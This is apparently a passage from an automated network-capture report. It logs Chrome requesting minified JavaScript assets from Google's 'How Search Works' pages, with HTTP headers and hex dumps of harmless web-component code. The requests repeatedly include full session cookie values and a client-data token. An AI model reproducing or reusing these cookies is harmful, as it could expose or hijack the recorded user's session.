                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC531INData Raw: 69 6d 70 6f 72 74 7b 73 20 61 73 20 6c 7d 66 72 6f 6d 22 2e 2f 79 63 61 47 34 59 58 70 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 66 7d 66 72 6f 6d 22 2e 2f 30 58 50 77 54 46 63 67 2e 6d 69 6e 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 6e 29 7b 6c 65 74 20 65 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 70 6c 69 74 28 6e 2b 22 3d 22 29 5b 31 5d 3b 72 65 74 75 72 6e 20 65 3d 65 26 26 65 2e 73 70 6c 69 74 28 22 26 22 29 5b 30 5d 2c 65 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 64 28 6e 29 7b 63 6f 6e 73 74 20 65 3d 6e 2e 73 75 62 73 74 72 28 31 29 2c 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 73 70 6c 69 74 28 22 26 22 29 2e 66 6f 72 45 61 63 68 28 61 3d 3e 7b 63 6f 6e 73 74 20 74 3d 61 2e 73 70 6c
                                                                                                                                                                                                                                                                                          Data Ascii: import{s as l}from"./ycaG4YXp.min.js";import{e as f}from"./0XPwTFcg.min.js";function h(n){let e=window.location.search.split(n+"=")[1];return e=e&&e.split("&")[0],e||null}function d(n){const e=n.substr(1),r={};return e.split("&").forEach(a=>{const t=a.spl
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1045INData Raw: 73 28 74 29 29 7c 7c 74 29 3b 72 65 74 75 72 6e 20 61 26 26 74 26 26 6d 28 65 2c 72 2c 74 29 2c 74 7d 3b 6c 65 74 20 70 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 6c 7b 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 73 75 70 65 72 2e 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 3b 63 6f 6e 73 74 20 65 3d 68 28 22 76 65 72 73 69 6f 6e 22 29 3d 3d 3d 22 32 22 3f 22 61 70 70 72 6f 61 63 68 2d 66 65 61 74 75 72 65 2d 63 61 72 64 73 22 3a 22 61 70 70 72 6f 61 63 68 2d 35 30 35 30 22 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 26 26 28 72 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 29 7d 61 73 79 6e 63 20 66 69 72 73 74 55 70 64 61 74 65 64 28 29 7b 61 77 61 69 74 20
                                                                                                                                                                                                                                                                                          Data Ascii: s(t))||t);return a&&t&&m(e,r,t),t};let p=class extends l{connectedCallback(){super.connectedCallback();const e=h("version")==="2"?"approach-feature-cards":"approach-5050",r=document.getElementById(e);r&&(r.style.display="none")}async firstUpdated(){await


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          142192.168.2.750107142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1382OUTGET /search/howsearchworks/assets/EWy3lfep.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1391
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 28 Mar 2024 02:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC531INData Raw: 69 6d 70 6f 72 74 7b 64 20 61 73 20 63 7d 66 72 6f 6d 22 2e 2f 7a 52 46 42 66 4a 5a 48 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 73 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 79 63 61 47 34 59 58 70 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 68 7d 66 72 6f 6d 22 2e 2f 30 58 50 77 54 46 63 67 2e 6d 69 6e 2e 6a 73 22 3b 76 61 72 20 75 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 2c 62 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 2c 76 3d 28 73 2c 74 2c 6c 2c 72 29 3d 3e 7b 66 6f 72 28 76 61 72 20 65 3d 72 3e 31 3f 76 6f 69 64 20 30 3a 72 3f 62 28 74 2c 6c 29 3a 74 2c 69 3d 73 2e 6c 65 6e 67 74 68 2d 31 2c 6f 3b 69 3e 3d 30 3b 69 2d 2d 29 28 6f 3d 73 5b 69 5d 29 26
                                                                                                                                                                                                                                                                                          Data Ascii: import{d as c}from"./zRFBfJZH.min.js";import{s as n}from"./ycaG4YXp.min.js";import{e as h}from"./0XPwTFcg.min.js";var u=Object.defineProperty,b=Object.getOwnPropertyDescriptor,v=(s,t,l,r)=>{for(var e=r>1?void 0:r?b(t,l):t,i=s.length-1,o;i>=0;i--)(o=s[i])&
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC860INData Raw: 6b 28 29 7b 73 75 70 65 72 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7d 64 69 73 61 62 6c 65 53 74 69 63 6b 79 28 29 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 74 68 69 73 2e 6f 6e 53 63 72 6f 6c 6c 2e 62 69 6e 64 28 74 68 69 73 29 29 7d 66 69 72 73 74 55 70 64 61 74 65 64 28 29 7b 74 68 69 73 2e 67 6c 6f 62 61 6c 4e 61 76 3d 74 68 69 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 67 6c 6f 62 61 6c 4e 61 76 22 29 2c 74 68 69 73 2e 67 6c 6f 62 61 6c 4e 61 76 53 70 61 63 65 72 3d 74 68 69 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 67 6c 6f 62 61 6c 4e 61 76 53 70 61 63 65 72 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f
                                                                                                                                                                                                                                                                                          Data Ascii: k(){super.disconnectedCallback()}disableSticky(){window.removeEventListener("scroll",this.onScroll.bind(this))}firstUpdated(){this.globalNav=this.querySelector("#globalNav"),this.globalNavSpacer=this.querySelector("#globalNavSpacer"),document.querySelecto


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          143192.168.2.750105142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1382OUTGET /search/howsearchworks/assets/v6TSeaUt.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC858INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 909
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 29 May 2024 21:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC532INData Raw: 69 6d 70 6f 72 74 7b 69 20 61 73 20 70 2c 73 20 61 73 20 75 2c 78 20 61 73 20 62 7d 66 72 6f 6d 22 2e 2f 79 63 61 47 34 59 58 70 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 6d 7d 66 72 6f 6d 22 2e 2f 30 58 50 77 54 46 63 67 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 67 7d 66 72 6f 6d 22 2e 2f 70 39 6b 63 50 71 39 31 2e 6d 69 6e 2e 6a 73 22 3b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 2c 63 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 2c 61 3d 28 6e 2c 74 2c 73 2c 6f 29 3d 3e 7b 66 6f 72 28 76 61 72 20 65 3d 6f 3e 31 3f 76 6f 69 64 20 30 3a 6f 3f 63 28 74 2c 73 29 3a 74 2c 6c 3d 6e 2e 6c 65 6e 67 74 68 2d 31 2c 69 3b 6c 3e 3d 30
                                                                                                                                                                                                                                                                                          Data Ascii: import{i as p,s as u,x as b}from"./ycaG4YXp.min.js";import{e as m}from"./0XPwTFcg.min.js";import{e as g}from"./p9kcPq91.min.js";var h=Object.defineProperty,c=Object.getOwnPropertyDescriptor,a=(n,t,s,o)=>{for(var e=o>1?void 0:o?c(t,s):t,l=n.length-1,i;l>=0
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC377INData Raw: 20 20 20 20 20 20 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6d 65 6e 75 22 0a 20 20 20 20 20 20 20 20 40 63 6c 69 63 6b 3d 24 7b 28 29 3d 3e 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 7d 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 70 61 72 65 6e 74 0a 20 20 20 20 20 20 3e 3c 2f 68 73 77 2d 62 75 74 74 6f 6e 3e 0a 20 20 20 20 60 7d 7d 3b 72 2e 73 74 79 6c 65 73 3d 70 60 0a 20 20 20 20 68 73 77 2d 62 75 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 35 66 36 33 36 38 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 73 77 2d 62 75 74 74 6f 6e 3a 3a 70 61 72 74 28 62 75 74 74 6f 6e 29 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 2d 31 32 70 78 3b 0a 20 20 20 20 20 20 68 65
                                                                                                                                                                                                                                                                                          Data Ascii: label="Toggle menu" @click=${()=>this.toggle()} transparent ></hsw-button> `}};r.styles=p` hsw-button { --hsw-button-color: #5f6368; } hsw-button::part(button) { margin-inline-start: -12px; he


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          144192.168.2.750106142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1382OUTGET /search/howsearchworks/assets/_OAi-NRQ.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 15582
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 29 May 2024 21:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC530INData Raw: 69 6d 70 6f 72 74 7b 41 20 61 73 20 6c 2c 78 20 61 73 20 6b 2c 72 20 61 73 20 24 2c 73 20 61 73 20 43 7d 66 72 6f 6d 22 2e 2f 79 63 61 47 34 59 58 70 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 53 7d 66 72 6f 6d 22 2e 2f 30 58 50 77 54 46 63 67 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6e 20 61 73 20 69 7d 66 72 6f 6d 22 2e 2f 49 59 6f 54 59 6a 59 45 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 5f 7d 66 72 6f 6d 22 2e 2f 70 39 6b 63 50 71 39 31 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6f 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 35 53 73 39 39 74 38 35 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6f 20 61 73 20 49 7d 66 72 6f 6d 22 2e 2f 52 70 49 2d 4f 74 59 72 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74
                                                                                                                                                                                                                                                                                          Data Ascii: import{A as l,x as k,r as $,s as C}from"./ycaG4YXp.min.js";import{e as S}from"./0XPwTFcg.min.js";import{n as i}from"./IYoTYjYE.min.js";import{e as _}from"./p9kcPq91.min.js";import{o as N}from"./5Ss99t85.min.js";import{o as I}from"./RpI-OtYr.min.js";import
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 64 65 6e 74 69 66 69 65 72 3a 20 42 53 44 2d 33 2d 43 6c 61 75 73 65 0a 20 2a 2f 63 6f 6e 73 74 20 79 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 22 29 2c 6a 3d 74 3d 3e 7b 69 66 28 74 3f 2e 72 3d 3d 3d 79 29 72 65 74 75 72 6e 20 74 3f 2e 5f 24 6c 69 74 53 74 61 74 69 63 24 7d 2c 67 3d 28 74 2c 2e 2e 2e 6f 29 3d 3e 28 7b 5f 24 6c 69 74 53 74 61 74 69 63 24 3a 6f 2e 72 65 64 75 63 65 28 28 6e 2c 65 2c 61 29 3d 3e 6e 2b 28 75 3d 3e 7b 69 66 28 75 2e 5f 24 6c 69 74 53 74 61 74 69 63 24 21 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 75 2e 5f 24 6c 69 74 53 74 61 74 69 63 24 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 60 56 61 6c 75 65 20 70 61 73 73 65 64 20 74 6f 20 27 6c 69 74 65 72 61 6c 27 20 66 75 6e 63 74 69 6f 6e 20 6d 75 73 74 20 62 65 20 61 20 27 6c 69 74
                                                                                                                                                                                                                                                                                          Data Ascii: dentifier: BSD-3-Clause */const y=Symbol.for(""),j=t=>{if(t?.r===y)return t?._$litStatic$},g=(t,...o)=>({_$litStatic$:o.reduce((n,e,a)=>n+(u=>{if(u._$litStatic$!==void 0)return u._$litStatic$;throw Error(`Value passed to 'literal' function must be a 'lit
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 65 72 79 53 65 6c 65 63 74 6f 72 28 60 3a 73 63 6f 70 65 20 3e 20 5b 73 6c 6f 74 3d 22 24 7b 6f 7d 22 5d 60 29 21 3d 3d 6e 75 6c 6c 7d 74 65 73 74 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 22 5b 64 65 66 61 75 6c 74 5d 22 3f 74 68 69 73 2e 68 61 73 44 65 66 61 75 6c 74 53 6c 6f 74 28 29 3a 74 68 69 73 2e 68 61 73 4e 61 6d 65 64 53 6c 6f 74 28 6f 29 7d 68 6f 73 74 43 6f 6e 6e 65 63 74 65 64 28 29 7b 74 68 69 73 2e 68 6f 73 74 2e 73 68 61 64 6f 77 52 6f 6f 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 6c 6f 74 63 68 61 6e 67 65 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 53 6c 6f 74 43 68 61 6e 67 65 29 7d 68 6f 73 74 44 69 73 63 6f 6e 6e 65 63 74 65 64 28 29 7b 74 68 69 73 2e 68 6f 73 74 2e 73 68 61 64 6f 77 52 6f 6f 74 2e 72 65 6d 6f 76 65
                                                                                                                                                                                                                                                                                          Data Ascii: erySelector(`:scope > [slot="${o}"]`)!==null}test(o){return o==="[default]"?this.hasDefaultSlot():this.hasNamedSlot(o)}hostConnected(){this.host.shadowRoot.addEventListener("slotchange",this.handleSlotChange)}hostDisconnected(){this.host.shadowRoot.remove
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 2d 76 69 73 69 62 6c 65 3a 20 30 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 20 23 66 66 66 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 78 2d 73 68 61 64 6f 77 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 23 66 66 66 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 31 38 35 61 62 63 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
